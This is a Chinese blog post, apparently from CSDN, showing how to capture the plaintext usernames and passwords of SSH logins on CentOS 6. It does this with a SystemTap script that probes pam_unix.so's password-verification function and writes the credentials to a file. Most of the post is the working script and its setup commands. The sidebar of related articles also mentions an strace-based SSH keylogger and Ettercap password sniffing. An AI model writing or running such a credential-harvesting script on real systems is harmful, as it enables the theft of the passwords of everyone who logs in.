使用systemtap抓取ssh登录的用户名和密码

最新推荐文章于 2022-11-16 19:27:33 发布
最新推荐文章于 2022-11-16 19:27:33 发布
阅读量120 收藏
点赞数
文章标签: 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33751566/article/details/85117998
版权

测试环境:CentOS6.4 32位

内核版本:2.6.32-358.el6.i686

 

yum --releasever=6.4 update

yum install -y systemtap

debuginfo-install $(rpm -qf /lib/security/pam_unix.so)

touch /root/capture_pass.stp

#!/usr/bin/stap
global username, pass, isSuccRet = 1;
probe process("/lib/security/pam_unix.so").function("_unix_verify_password")
{
username = user_string($name);
pass = user_string($p);
}
probe process("/lib/security/pam_unix.so").function("_unix_verify_password").return
{
if ($return == 0)
{
printf("User: %s\nPassword: %s\n\n", username, pass);
isSuccRet = 0;
}
}
probe process("/lib/security/pam_unix.so").function("pam_sm_open_session")
{
if (isSuccRet != 0)
{
printf("Login via ssh service.\n\User: %s\nPassword: %s\n\n", username, pass);
}
isSuccRet = 1;
}

touch password.txt

chmod +x capture_pass.stp

stap capture_pass.stp -o password.txt

151457146.jpg

本地执行capture_pass.stp脚本,同时ssh远程登录系统,即使第一次登录失败也没有问题,不会记录尝试输入的错误密码。登录成功后ctl+C终止脚本运行,查看password.txt,成功捕获。

093409635.jpg

原理主要是对PAM模块pam_unix.so库文件的函数调用进行捕获,因为用户登录认证需要使用pam_unix.so库文件。

weixin_33751566
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux下监控并实现记录ssh登录密码
2ed
12-27 2739
测试环境: Linux 2.6.32-754.25.1.el6.x86_64 CentOS release 6.10 (Final) 首先安装systemtap这个包 原理主要是对PAM模块pam_unix.so库文件的函数调用进行捕获,因为用户登录认证需要使用pam_unix.so库文件。 yum --releasever=6.4 update yum install -y ...
systemtap探测用户态程序性能
chuqingq的专栏
11-07 548
http://openresty.org/download/agentzh-nginx-tutorials-zhcn.html nginx性能跟踪中使用dtrace测试ngx_access和ngx_lua中的access_xxx的性能差异。 linux下需要使用systemtap。   只讲了内核态(syscall),没讲用户态如何跟踪http://www.ibm.com/develo...
用户空间的SystemTap探测是怎么工作的
羽飞的专栏
08-01 1133
这篇文章介绍SystemTap在用户层的实现原理。对文档进行了部分摘抄翻译,原文易懂,建议阅读原文:How SystemTap Userspace Probes Work。另外介绍另一篇文档:动态追踪技术漫谈 在给Bitcoin增加SystemTap时,对它的实现感到很疑惑,还有这会增加多少开销。 实际上,我想知道的是: 使用SystemTap的可执行程序会增加什么指令? 使用st...
使用 SystemTap 调试内核
07-30
SystemTap 是一个专门为 Linux 内核开发者和系统管理员设计的高级诊断工具,它允许用户在不修改内核源代码、不重新编译和重启系统的情况下,收集和分析运行中的内核数据。SystemTap 的出现极大地简化了对内核的调试...
使用systemtap进行调试介绍
07-22
systemtap是什么?如何通过systemtap对应用程序内核程序进行调试?如何编写运行systemtap脚本?
使用动态跟踪技术SystemTap监控Oracle和mysql性能——吕海波@美创科技.pdf
08-24
动态跟踪技术,特别是SystemTap,是一种强大的工具,用于在不影响程序正常运行的情况下,实时地监控和分析系统行为。SystemTap是专为Linux设计的一种动态跟踪框架,它允许开发者编写脚本,这些脚本可以在内核级别...
SSH Keylogger密码抓取
最新发布
The current road is different, love needs to distinguish between right and wrong
11-16 1113
SSH Keylogger终端切换用户记录用户输入的终端信息可获取密码主要利用strace系统调试工具获取ssh的读写连接的数据,以达到抓取管理员登陆其他机器的明文密码的作用。没有那么多天赋异禀,优秀的人总是努力地翻山越岭。
系统级性能分析工具--Systemtap
飘过的春风
05-05 5625
  SystemTap 是一款诊断Linux系统性能的工具,可以跟踪内核以及用户态程序中的任意函数、syscall、语句甚至指令,可以用来动态地收集调试和性能信息的工具,不需要我们重新编译、重启内核。缺点:用户需要自己编辑脚本测试文件。 假如现在有这么一个需求:需要获取正在运行的 Linux 系统的信息,如我想知道系统什么时候发生系统调用,发生的是什么系统调用等这些信息,有什么解决方案呢? 最...
systemtap函数调用栈信息不齐的原因和解决方法 :print_backtrace
scdxmoe的专栏
10-08 2654
http://blog.yufeng.info/archives/1229  本文链接地址: systemtap函数调用栈信息不齐的原因和解决方法 有时候在看系统代码的时候,我们很难从源码中看出我们感兴趣的函数是如何被调用的,因为调用路径有可能太多。用户空间的程序gdb设断点是个好的方法,内核的就麻烦了。这时候systemtap可以帮忙, 比如:
关于wireshark抓包工具抓取登录数据的一点心得
facing-screen's blog
08-06 4138
    研究这个软件很久了,一直处于门外汉状态,今天终于用它抓到点有用的东西,做个简单的笔记吧,后面再继续完善。     最近研究跨域自动登录时一直不太顺利,今天就仿照网上前辈们的方法,用wireshark先抓一下手动登录时发送的数据。写了一条过滤非目标ip的过滤规则,然后看到一个info下是POST/HTTP/1.1…的包,点开后在最下边的HTML Form URL Encoded里看到了我在...
systemtap 用户态调试
weixin_34185364的博客
09-16 327
#include <stdio.h> int main( void) { int a=0; a=fun(1115,20); printf("%d\n",a); } int fun(int a,int b) { return a+b; } test.cgcc -g test.c 生成 a.out -----------------------...
systemtap用户态堆栈符号解析不到的问题
juzejian的专栏
09-26 710
在做性能profile的时候,直观上感觉应该在profile的时候只记录基本数据,在最终记录完成后一次性进行符号解析,防止对系统性能造成影响。所以写的probe脚本是这样的: systemtap script: global bts; // backtracesprobe timer.profile {    ​if (pid() == target()) {    ​    ​bts[...
systemtap打印accept的进程pid和对应的socket套接字(嵌入c的使用
hzj_001的博客
08-23 677
#probe kernel.function("unix_accept") %{ #include <net/sock.h> #include <net/af_unix.h> %} function _unix_path:long(sock:long) %{ struct socket *sock = (struct socket *)(long) ST...
信息安全—利用Wireshark抓取SSH认证协议数据包
qq_44725217的博客
05-30 8883
请利用Wireshark抓取SSH认证协议数据包
【kail】使用Ettercap抓取用户名密码
爪白白的个人博客
12-14 5834
【kail】使用Ettercap获取局域网内所有主机 ip 获取局域网内所有主机登录登录网站时,用户名密码(http)
使用SystemTap深度分析Linux内核性能
"SystemTap: 用于分析性能和功能问题的Linux内核监控" SystemTap是一个强大的工具,专门设计用于Linux内核的动态监控和性能分析。这个工具允许用户无需修改内核源代码或重新编译就能收集系统级别的数据。通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值